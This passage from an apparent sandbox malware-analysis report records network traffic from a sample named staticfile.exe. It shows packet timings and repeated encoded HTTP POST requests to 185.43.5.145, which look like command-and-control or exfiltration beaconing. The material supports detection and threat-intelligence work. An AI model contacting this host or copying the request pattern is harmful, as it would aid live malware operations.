                  Dec 27, 2024 04:03:40.602468014 CET8049926185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:40.602580070 CET4992680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:40.602718115 CET4992680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:40.722137928 CET8049926185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:40.771723986 CET4992480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:40.824321032 CET8049921185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:40.827126980 CET4992180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:40.891362906 CET8049924185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:40.891431093 CET8049924185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:40.959187984 CET4992680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:41.078723907 CET8049926185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:41.778636932 CET8049924185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:41.834048986 CET4992480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:41.922373056 CET8049926185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:41.974669933 CET4992680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.026290894 CET8049924185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:42.068417072 CET4992480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.160923004 CET8049926185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:42.209048033 CET4992680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.286676884 CET4992480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.286756992 CET4992680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.287029028 CET4993080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.406529903 CET8049924185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:42.406562090 CET8049930185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:42.406603098 CET4992480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.406662941 CET4993080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.406809092 CET4993080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.406888008 CET8049926185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:42.406936884 CET4992680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.526206017 CET8049930185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:42.756036997 CET4993080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:42.875581980 CET8049930185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:43.781626940 CET8049930185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:43.834182978 CET4993080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:44.026067019 CET8049930185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:44.068474054 CET4993080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:44.141026974 CET4993080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:44.141223907 CET4993580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:44.260776997 CET8049935185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:44.260869026 CET8049930185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:44.260884047 CET4993580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:44.260931969 CET4993080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:44.261029959 CET4993580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:44.380479097 CET8049935185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:44.615677118 CET4993580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:44.735336065 CET8049935185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:45.639559031 CET8049935185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:45.693522930 CET4993580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:45.882273912 CET8049935185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:45.927901983 CET4993580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:46.002836943 CET4993580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:46.003150940 CET4994080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:46.122695923 CET8049940185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:46.122723103 CET8049935185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:46.122955084 CET4993580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:46.122955084 CET4994080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:46.123009920 CET4994080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:46.242459059 CET8049940185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:46.474767923 CET4994080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:46.594903946 CET8049940185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.038032055 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.038086891 CET4994080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.156539917 CET4994480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.157601118 CET8049943185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.157808065 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.157808065 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.201152086 CET8049940185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.204619884 CET8049940185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.204781055 CET4994080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.505908966 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.506124020 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.734738111 CET8049940185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.734859943 CET4994080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.736296892 CET8049944185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.736320972 CET8049943185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.736339092 CET8049943185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.736358881 CET4994480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.736510038 CET4994480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:47.736676931 CET8049943185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.736699104 CET8049943185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.854322910 CET8049940185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:47.855901003 CET8049944185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:48.084109068 CET4994480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:48.203608990 CET8049944185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:48.949809074 CET8049943185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:48.990289927 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.085961103 CET8049944185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:49.131028891 CET4994480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.185201883 CET8049943185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:49.240293980 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.320936918 CET8049944185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:49.365387917 CET4994480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.439076900 CET4994480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.439078093 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.439294100 CET4994980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.558767080 CET8049949185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:49.558873892 CET4994980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.558993101 CET8049944185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:49.559022903 CET4994980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.559050083 CET4994480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.559469938 CET8049943185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:49.559528112 CET4994380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:49.678575039 CET8049949185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:49.912244081 CET4994980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:50.031801939 CET8049949185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:51.015722990 CET8049949185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:51.068413019 CET4994980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:51.262276888 CET8049949185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:51.318463087 CET4994980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:51.379929066 CET4995480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:51.499526978 CET8049954185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:51.499639034 CET4995480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:51.499799013 CET4995480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:51.619219065 CET8049954185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:51.849951982 CET4995480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:51.969472885 CET8049954185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:52.865818024 CET8049954185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:52.912228107 CET4995480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.110179901 CET8049954185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:53.162183046 CET4995480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.235073090 CET4994980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.237226963 CET4995480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.237541914 CET4995980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.357045889 CET8049954185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:53.357067108 CET8049959185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:53.357111931 CET4995480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.357157946 CET4995980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.357357979 CET4995980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.634949923 CET8049959185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:53.709232092 CET4995980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:53.828845024 CET8049959185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.194030046 CET4995980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.194057941 CET4996380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.313740969 CET8049963185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.313863993 CET4996380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.313970089 CET4996380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.314026117 CET4996480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.357234001 CET8049959185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.433585882 CET8049963185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.433624983 CET8049964185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.433723927 CET4996480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.433871984 CET4996480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.553348064 CET8049964185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.565140009 CET8049959185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.565221071 CET4995980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.662231922 CET4996380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.781704903 CET8049963185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.781814098 CET8049963185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:54.787272930 CET4996480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:54.906797886 CET8049964185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:55.728466034 CET8049963185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:55.771523952 CET4996380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:55.810590029 CET8049964185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:55.865276098 CET4996480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:55.979660034 CET8049963185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:56.021533966 CET4996380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.054394960 CET8049964185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:56.099659920 CET4996480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.179301023 CET4996380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.179384947 CET4996480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.180071115 CET4996880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.299110889 CET8049963185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:56.299293995 CET4996380192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.299499989 CET8049968185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:56.299587965 CET4996880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.299679995 CET8049964185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:56.299736023 CET4996480192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.299829006 CET4996880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.419361115 CET8049968185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:56.646703005 CET4996880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:56.766216040 CET8049968185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:57.682112932 CET8049968185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:57.724638939 CET4996880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:57.961121082 CET8049968185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:57.961298943 CET4996880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:58.078886032 CET4997180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:58.136795044 CET8049968185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:58.138648987 CET4996880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:58.198434114 CET8049971185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:58.198553085 CET4997180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:58.198730946 CET4997180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:58.318208933 CET8049971185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:58.552824974 CET4997180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:58.672383070 CET8049971185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:59.577157974 CET8049971185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:59.630875111 CET4997180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:59.856327057 CET8049971185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:59.912132025 CET4997180192.168.2.5185.43.5.145

                  HTTP Request Dependency Graph

                  • 185.43.5.145

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549750185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:37.774264097 CET418OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 344
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:38.131818056 CET344OUTData Raw: 00 01 04 03 06 00 01 04 05 06 02 01 02 02 01 0b 00 00 05 0d 02 03 03 0b 01 02 0f 00 05 01 01 05 0a 04 06 0e 03 05 06 0b 0e 53 07 53 06 01 06 0f 03 00 0e 0d 0f 01 01 06 05 0e 07 0d 04 51 05 0e 05 04 0e 0e 04 03 07 02 0f 06 0e 03 0f 50 0e 05 07 56
                  Data Ascii: SSQPVTVQ\L~C|s}_cbmOwetA|SOw|c^hMhxRUHlcaX|TkT`hie~V@z}z~L}
                  Dec 27, 2024 04:02:39.151474953 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:39.256165028 CET1236INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:38 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 1380
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 56 4a 7d 59 7a 6d 73 06 7b 61 60 05 7f 5f 7b 01 7e 49 63 0b 7f 5e 5b 40 7b 63 6b 59 7f 61 64 46 74 63 65 41 79 5f 53 02 61 66 78 07 7c 61 78 01 55 4b 72 53 77 62 7b 44 7f 5c 7d 01 6b 67 7d 52 7b 66 5e 0c 7e 4d 77 00 62 71 71 4c 77 61 7d 00 7f 71 71 5c 7f 6c 5d 53 69 49 67 06 75 4c 7b 06 7c 5b 62 5a 6a 60 7a 58 7b 49 5e 06 7b 74 70 4d 7b 0b 63 4b 6e 04 6f 5a 7b 63 79 5d 7c 4e 7c 03 6c 67 52 44 69 71 64 5e 75 61 56 47 7a 51 41 5b 7d 64 67 53 7f 4f 58 50 62 6f 6f 5c 7b 0a 7c 46 77 06 65 55 7b 72 6d 02 7d 52 76 4e 6f 71 57 5d 75 5a 7f 06 76 4f 5d 5a 74 4f 7a 50 7e 5d 7a 06 60 5c 6d 4f 61 66 7f 50 7f 6c 66 5e 60 6f 6c 04 7e 73 6c 01 6f 6c 5d 03 7b 5e 66 4b 6b 6d 78 08 60 67 6c 03 7e 61 7d 50 7e 7d 51 08 7a 6e 66 05 69 5c 7d 4e 7b 5d 46 51 7c 42 60 41 7e 06 64 41 6a 59 7e 4e 6f 7d 74 5e 7b 61 7c 02 6b 71 73 07 7d 77 52 53 7f 60 6a 51 6e 5d 70 07 7d 4c 67 59 60 5d 57 51 7b 5c 79 03 75 76 52 01 7c 66 56 04 7d 58 7d 41 77 72 7b 06 7c 4c 5b 4c 7f 49 7a 0c 78 48 7c 09 7e 73 7f 4a 75 4c 5b 02 74 71 6d 05 7e 71 [TRUNCATED]
                  Data Ascii: VJ}Yzms{a`_{~Ic^[@{ckYadFtceAy_Safx|axUKrSwb{D\}kg}R{f^~MwbqqLwa}qq\l]SiIguL{|[bZj`zX{I^{tpM{cKnoZ{cy]|N|lgRDiqd^uaVGzQA[}dgSOXPboo\{|FweU{rm}RvNoqW]uZvO]ZtOzP~]z`\mOafPlf^`ol~slol]{^fKkmx`gl~a}P~}Qznfi\}N{]FQ|B`A~dAjY~No}t^{a|kqs}wRS`jQn]p}LgY`]WQ{\yuvR|fV}X}Awr{|L[LIzxH|~sJuL[tqm~qjI~|pC~gkuasH{\SG~Ni{g|L{IxL{mQIz\dI{sP`l{Yl|bw@v_|H}|YR@|a}Nw|ROxlptN~{q_H}BTLzajv]cJu_`vaz@~`PNw\yweZO~|qwB|ct{R{J{NfD|}tNvw|}Lf}CU{Sz~b}pd@|Rx~p||gvLzm{Dxr|qs|wg`izslL~blvce{qWvvZ}v`O}f[BwrYI|baBITyvp|sQurmtaa_~}|t}IYvqYxrqI~N[ywZNyw|Lx}{Fxb^{sz{]NZ{YVD|q@wr|~R`X}wd}qbUuB|oR|wNby}H}z_z\y\}b`g{ZL~Jx^P`aOvet~|v_wl`hc|IoUc{`}ZkCh`YRA~\yTzSYQ`q[QqB`gNc{jsQ^OBln`I`qgERrJjk|x]GQm]`~bXwsTTzXjYvvZ~Xg[}H[tb|[rb_}d~{flQ|YAYbn@Zr@k_DhUSkd_[cYz_q^izY|M{JMy}YX{u_o`AP|o]WdUjZ]f|zS^VJsbP~KqQN_ogGZsOnXEkyZo_GZ^q^Z]LucSyEp_O\boNRHcU@is_lZDW_}Eh~lPvZsyge~KzTRTWu
                  Dec 27, 2024 04:02:39.256191015 CET373INData Raw: 45 54 61 54 47 50 58 08 41 68 6f 5d 49 52 06 04 77 6a 64 06 58 7c 53 5d 5a 62 5b 67 02 78 73 5e 45 50 5e 45 51 7d 77 7a 56 6e 60 00 42 52 7e 63 5f 58 60 05 5e 6d 07 09 02 5a 5c 63 4b 56 67 7f 41 6a 75 6d 51 76 5f 78 65 67 4f 79 46 7b 5e 57 55 54
                  Data Ascii: ETaTGPXAho]IRwjdX|S]Zb[gxs^EP^EQ}wzVn`BR~c_X`^mZ\cKVgAjumQv_xegOyF{^WUT{KW`V@ZZ\[nEU}ydUsMj`{qYdETnj\iwzgRtlkt\zzx_maFWaXScUoFWqZBbbbYh`x{^{qQN_ogGZsOnXEk}@W[aAZZ`F\p^[bbP~]yx[rYr{zSofLXow]x^NZl`DVsKhULa
                  Dec 27, 2024 04:02:39.285521030 CET394OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 380
                  Expect: 100-continue
                  Dec 27, 2024 04:02:39.637546062 CET380OUTData Raw: 51 56 5d 53 5d 44 5a 5d 54 58 56 53 59 5c 58 52 55 54 5c 58 51 5f 53 59 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QV]S]DZ]TXVSY\XRUT\XQ_SYT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'G<,"<>361/2?)["*4T++6%#!W,8 !<(<:9[".Z/
                  Dec 27, 2024 04:02:39.731559038 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:40.087733984 CET324INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:39 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 24 06 34 1b 30 12 3e 3f 30 53 30 2b 32 56 2b 57 2a 15 2f 2e 2a 03 3d 2d 3a 06 39 59 23 5b 36 3f 32 05 3d 3d 23 5c 26 26 23 1f 36 31 2d 5d 02 1a 20 59 22 32 29 55 27 20 2f 13 39 33 03 1c 3d 0d 2e 12 33 2b 3a 53 31 06 2c 0a 22 23 29 56 31 0c 31 57 2e 1a 38 00 3b 09 01 0c 27 10 23 5f 03 14 39 50 22 10 24 13 26 22 2d 02 23 28 25 1e 35 34 07 1e 29 5e 34 04 2a 3b 04 5b 27 31 23 02 27 13 2a 57 3e 07 2e 1d 35 12 01 03 3d 19 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: $40>?0S0+2V+W*/.*=-:9Y#[6?2==#\&&#61-] Y"2)U' /93=.3+:S1,"#)V11W.8;'#_9P"$&"-#(%54)^4*;['1#'*W>.5= P!"T0\S
                  Dec 27, 2024 04:02:40.162365913 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Dec 27, 2024 04:02:40.521759033 CET1328OUTData Raw: 51 55 5d 58 5d 49 5f 50 54 58 56 53 59 58 58 57 55 57 5c 5b 51 5d 53 59 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QU]X]I_PTXVSYXXWUW\[Q]SYT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C<+"[2?Z!9#>+!&\!0>,;_6,T<*9[".Z/6
                  Dec 27, 2024 04:02:40.608403921 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:41.141308069 CET324INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:40 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 27 5b 23 36 24 50 3e 3c 20 53 33 01 2d 0f 29 31 3e 5d 2d 2e 36 07 3d 3d 21 5c 2e 59 23 11 21 02 03 5c 29 10 37 59 27 18 0e 01 36 31 2d 5d 02 1a 23 04 35 54 31 54 27 30 2f 5a 2e 55 2e 42 3d 23 3e 5b 30 15 00 18 25 06 27 1e 23 33 35 50 32 22 39 14 2f 34 24 03 2e 24 38 52 24 00 23 5f 03 14 39 57 21 00 23 01 32 0f 2e 13 23 2b 2a 0b 35 1a 00 0a 29 28 02 00 2a 3b 2e 5a 27 21 37 01 26 2e 2a 55 3d 39 00 10 23 3f 30 5d 2b 33 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: '[#6$P>< S3-)1>]-.6==!\.Y#!\)7Y'61-]#5T1T'0/Z.U.B=#>[0%'#35P2"9/4$.$8R$#_9W!#2.#+*5)(*;.Z'!7&.*U=9#?0]+3 P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.549756185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:39.621743917 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:02:39.979406118 CET1048OUTData Raw: 51 57 58 5e 5d 41 5f 54 54 58 56 53 59 59 58 51 55 5c 5c 5c 51 5a 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QWX^]A_TTXVSYYXQU\\\QZS]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'B<?<>3!"8%64*+"%?[ 0)S:,5<(9[".Z/2
                  Dec 27, 2024 04:02:41.024756908 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:41.275346994 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:40 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.549757185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:41.515373945 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
